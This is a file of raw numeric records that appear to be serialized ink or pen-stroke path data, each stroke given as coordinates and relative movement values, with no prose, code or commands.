0 1,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,0-1 0,-1-1 0,-1 0 30,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 1 0,0 0 0,1 0 0,-6 3 0,-6 3 104,1 0-1,0 1 0,0 0 1,1 1-1,1 1 0,-1 0 1,2 1-1,-20 23 0,31-33-144,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,2 1 1,8 5 10,0 0 0,0-1-1,22 8 1,-33-14-20,29 12-88,-15-6-186,1 0-1,1 0 1,-1-2 0,25 5-1,-34-9-297,-1 0-1,0 0 1,1 0-1,-1-1 1,0 0-1,8-2 1,-6 1-806,-1-1 0,0 0-1,0 0 1,0-1 0,12-8 0,10-5-2094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19 792,'0'-3'553,"-1"-9"5716,1 11-6200,0 1 0,0 0 0,0 0 0,0 0-1,0-1 1,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-34 15 2576,23-12-2075,1 1 0,0 0 0,1 1 0,-16 10 0,10-3-61,5-6-339,1 1-1,-1 0 1,1 1 0,1 0-1,-1 0 1,2 1-1,-11 15 1,17-22-153,0-1-1,0 0 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0-1-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 0 0,5-1-1,20 0-433,-1-2 1,0-1-1,0 0 1,0-2-1,48-18 1,-63 19-1499,1-1 1,-1 0 0,-1-1 0,1 0 0,-1 0 0,11-11 0,-8 1-1215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1 768,'0'0'70,"1"0"0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,-1 0 0,-4 22 2215,-6 26 200,11 112 1536,0 78-2534,11-206-1587,-18-26-3918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6:5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1748,'0'0'2777,"32"-6"2332,-16 5-3663,0-1 0,0 0-1,16-5 1,-16 3-844,1 1 1,-1 0-1,19 0 1,-18 3-447,-11-1-141,0 1 1,0-1-1,0 1 0,0 1 1,0-1-1,0 1 0,0 0 1,0 0-1,7 4 0,24 6-2176,2-10-4723,-28-1 4186,-1 0-839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10 139 96,'0'-2'11875,"0"3"-12196,0-1 466,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,4 2 1248,-1-1-1374,-2 3-14,0 300 941,-6-291-936,6-13-9,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,1 0 0,1-119 1028,-2 114-1024,0-4 3,0 0 0,0 0 0,1 0 0,0 0 0,1 0 0,3-13 1,-1 0-4,5-9-9,4-2 1,6-8 26,13-20 53,-26 54-81,0 0 1,0 1 0,1-1-1,-1 1 1,1 0-1,1 1 1,-1-1-1,1 1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 1-1,1 1 1,0-1-1,10 0 1,-13 3-4,1 0 0,0 1 0,-1 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 1 0,11 7 0,-16-10 8,1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 2 0,-32 26-23,26-23 12,-13 8-27,0-1 0,0-1 1,-1-1-1,-1-1 0,0 0 0,0-2 1,-36 8-1,27-6 42,10-2-33,7-3-2992,4-2-2510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 1428,'-3'-1'423,"1"1"-1,-1 0 0,0 0 1,1 0-1,-1 0 0,0 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,-1 0-1,1 0 0,0 0 1,-4 3-1,4-2-315,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0-1 0,1 6 0,-1-6-68,1-1 1,-1 0-1,1 1 1,-1-1-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,3 1-1,29 16 933,-21-12-609,-10-5-280,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,-1-1-1,1 1 0,-1-1 1,0 0-1,5-2 0,38-23 966,-32 17-861,-12 8-142,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1-3 0,0 4-21,1 1-3,-1 0-1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 1 0,0-1-1,0 0 1,-41-41 917,39 41-905,0 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,-4 0-1,-16-5 336,21 4-337,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 1-1,0-1 1,-2 1 0,-9 0 93,11-1 133,0 1-255,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1 0 1,-1-1-1,0 1 0,1 0 1,-2 2-1,-2 3 10,5-7-14,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0 0 1,-3 2-7,2-2 7,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1 0-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0 0,0-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1-1,-1-1 1,1 0-1,0 1 1,5 11-21,-6-11 17,0 0 1,0-1-1,0 1 1,0-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,-1 0 1,2 1-1,1 3-367,7 8-1185,-9-12 1459,-1 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,9-10-6186,-8 5 3219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36 888,'0'0'107,"1"0"1,0 0-1,-1-1 0,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,0 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,-1-2 1,5-3 822,3-8 2872,-10 19-2154,2-5-1293,0-1 0,1 1 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 1 1,11 58 72,0-29-334,-1-9 61,-9-21-140,1 1 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,0 4 0,2-1-9,-2-4-10,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0 0,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1-1 1,0 1-1,0 0 1,0 0 0,0 0-1,0 2 1,1 11-572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1 244,'0'0'6759,"2"18"1697,4-17-8269,0 0 0,0 1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1 0 0,-1 0 0,0 0-1,0 0 1,-1 1 0,6 5 0,22 14 104,31 14-80,-54-30-276,8 5-552,-17-12 501,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0-1,-1-1 1,1 1 0,0 0 0,0-1-1,0-2-2569,0 2 2467,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,0-1 1,0 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 0-1,1 1 1,-1-1-1,2 0 1,-1 0-582,1-10-1384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25 532,'1'-2'258,"0"1"0,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,4-1 0,-5 2-154,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,0 0-1,-2 5 327,0-1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,-1 0-1,1-1 1,-1 1-1,0-1 0,-6 5 1,-14 19 854,-12 7-442,30-30-728,1 0 0,-1 0 1,1 1-1,0 0 1,-8 10-1,3-1 43,-2 0 1,1-1-1,-2 0 1,-16 14-1,13-13-117,0 2-1,-17 22 1,11-18-85,-1 2-44,9-7 63,13-15 19,-1 0 0,1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 3 1,0-3-192,3 2-1229,-2-3 1386,-1 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,31-26-10877,-20 15 7825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 16,'0'0'3013,"10"-6"4772,-38 28-2838,-8 23-3198,3-3-994,-10 30 211,41-67-896,-1 0-1,1 0 1,0 0 0,0 0-1,1 0 1,-1 0-1,0 10 1,-5 14 210,0-11-111,4-13-115,1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,2 0 0,-2 10 0,-4 10 83,6-24-135,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 1,-1 1-1,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,1 0 0,3 9-17,1-2 1,6-2 113,21 8-1906,-31-15 1392,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 1,1-2-1,20-17-5848,-13 9 4078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55 684,'-11'18'3860,"13"-11"-3578,0-1 0,1 1 0,0-1 1,0 0-1,7 10 0,-4-11-144,0 0-1,1 0 1,-1-1 0,1 0-1,0 0 1,0 0-1,0-1 1,1 0 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0-1 1,-1-1-1,1 1 1,0-1 0,0 0-1,0-1 1,0 0-1,-1 0 1,1 0 0,13-5-1,-13 1-40,0 0-1,0 0 0,-1-1 1,13-11-1,-18 14 57,0 1 1,1-1-1,-1 0 0,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 0,1 0 1,-1-1-1,0 1 0,0 0 1,0-1-1,-1 1 0,1-5 1,-1 6-4,0 0 1,0 0 0,-1 0-1,1-1 1,-1 1 0,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,0 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,0 1 1,-1-2 0,-2 0 36,0 0 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,-7-2 1,6 2-161,0 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,1-1 0,-8 4 0,11-3-289,0 1 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 2-1,-2 4 1,3-4-962,0-1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0-1-1,-5 5 1,-3-1-1922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1008,'0'5'6621,"-8"8"-5061,7-12-1428,-1 1 1,1-1-1,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1-1 0,0 4 1,-9 41 1842,9-42-1839,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,1 0 0,0-1-1,4 7 1,-2-7-78,0 0-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1-1-1,-1 0 1,1-1-1,0 1 1,5 0-1,0-1-6,-1-1 1,1-1-1,-1 1 0,1-2 0,-1 1 1,1-1-1,-1-1 0,0 1 0,0-2 0,0 1 1,-1-1-1,12-7 0,-18 10-47,1-1 0,-1 1 0,0 0-1,0-1 1,0 0 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,2-4 0,8-25 67,-11 23-11,0 7-35,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1-2 0,-2-23 505,-8 17-355,11 8-169,-1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 1-1,1-1 1,-3 0 0,3 1 14,-1 0 1,1 0-1,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0-1-1,-2-1 0,-4-2 294,7 4-168,0 0-144,1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,-1 0 1,-25 1 55,18 0-48,6-1-11,0 1-1,0-1 1,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 1 1,-3 2-1,-9 5-4,1-3-6,-6 6-7,0 8 28,19-20-7,0 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1-1 1,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,1 2-13,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,0 0-1,4 5 1,-5-6-149,0-1 1,0 0 0,-1 0 0,1 0 0,1 1-1,-1-1 1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0-1,-1-1 1,1 1 0,2-2 0,17-10-8941,-10 6 5732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1 332,'10'-1'11009,"-18"16"-9014,7-13-1902,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 2 0,0 104 1162,11-78-1337,-11-28-154,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,3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68 104 684,'-5'14'3646,"4"-14"-3614,1 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,1 0 0,10 31 905,2-13-559,-12-16-348,0 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,0 0 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 0-1,4 1 0,0-1 77,0 1-38,-1-1 0,1 0 0,0-1 0,0 1-1,0-1 1,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,9-4 0,4-3-36,1-1 0,-1 0 1,-1-1-1,0-1 0,19-20 1,-35 32 45,0-1-1,0 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,-1-2-1,1 1 85,0 1-1,0-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 1 1,-1 0-1,0 0 1,-3-3-1,-14-6 889,14 8-876,1 0-1,-1 0 0,0 0 1,0 1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,-6 1 0,-5 2-91,1 1 0,-1 1-1,1 1 1,0 0 0,0 1 0,0 1-1,-28 17 1,37-20-93,0 0 1,1 1-1,0 0 0,0 1 1,0 0-1,1 0 0,-1 0 1,1 0-1,-6 11 0,10-12-374,0 1 0,0-1-1,0 0 1,1 0 0,0 1-1,0-1 1,0 0 0,1 7 0,0 7-6806,-1-13 4014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1076,'-9'-2'10311,"7"4"-9036,2 0-1041,0 0 1,0 1 0,0-1-1,-1 0 1,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0-1,0 0 1,-2 2-1,-9 33 744,6-28-818,1 1 1,1-1-1,0 0 1,0 1-1,-2 12 1,2-10 38,0 0 0,0 0 1,-9 16-1,6-13-69,2 0 0,-1 1-1,2 0 1,0 0 0,1 0 0,1 0-1,1 0 1,0 1 0,1 21-1,0-28-108,0 1-1,1 0 1,4 20-1,-5-28-31,1-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,1-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,2 1-1,7 1-156,-10-3-143,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,-1-1-1,1 0 1,0 1-1,0-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,1-5-3469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11 231 184,'-10'0'3890,"23"1"3763,-5 0-4264,1-9-3497,3-5 151,0 2 0,0-1 1,1 2-1,26-17 0,15-22-5,-50 47-41,-1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,3-5 0,20-19 16,-23 26-14,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1-1,0-1 1,0 1 0,0 0 0,-1 0-1,3-5 1,5 9 351,-8 0-106,-9 0-206,6-2 105,2 0-119,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,8 2 183,-16-1-115,6 0 141,3-2-119,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,1 0 0,-1 0-1,0 0 1,0 1 0,1-1-1,-1 1 1,1-1-1,2-1 1,-2 3-97,-4 1-58,1-1 41,1 1-1,-1-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 0,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 0,1-1 1,0 1-1,0 0 1,0-1-1,1 1 1,-1-1-1,0 1 1,0 0-1,0-1 0,1 2 1,-3 7-14,-2-2 36,1 1 0,-1 0 0,1 0 0,1 1 0,0-1 1,-2 13-1,-3 8 103,-14 79 437,19-99-537,0 0-1,1 0 1,0 0 0,1 0 0,0 0-1,2 15 1,0 9-20,-2-33-3,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 1,0 0-1,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-5-6-1656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20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36 144,'0'-8'13934,"0"-19"-3528,0 27-10335,0 0 1,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,-6 3-5134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11 776 268,'0'0'1171,"-1"12"3109,-1-13-4982,-2-2 3462,11 1 3909,-17 3-1700,10-2-4700,1-29 615,19-1-305,-19 28-549,-1 1 1,1-1-1,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 0 0,1-1 0,-1 1 0,1 1 0,2-3 0,37-34 260,-4 4-107,-26 22-124,0 2 0,1-1 0,1 1 0,-1 1 0,1 0 0,21-10 0,91-33-23,-121 50-33,216-89-96,-195 82 101,4-1-17,46-24 1,-47 20 24,49-16 1,-46 18-43,27-11-47,48-15-263,-30 20 506,79-8-1,-22 5 130,-86 17-276,-39 4-23,0 0-1,0 0 1,0-1 0,0-1-1,0 1 1,9-4 0,5-2 1,1 2 1,0 0 0,1 2 0,29-2-1,39-5 39,-68 6-24,1 2 0,33 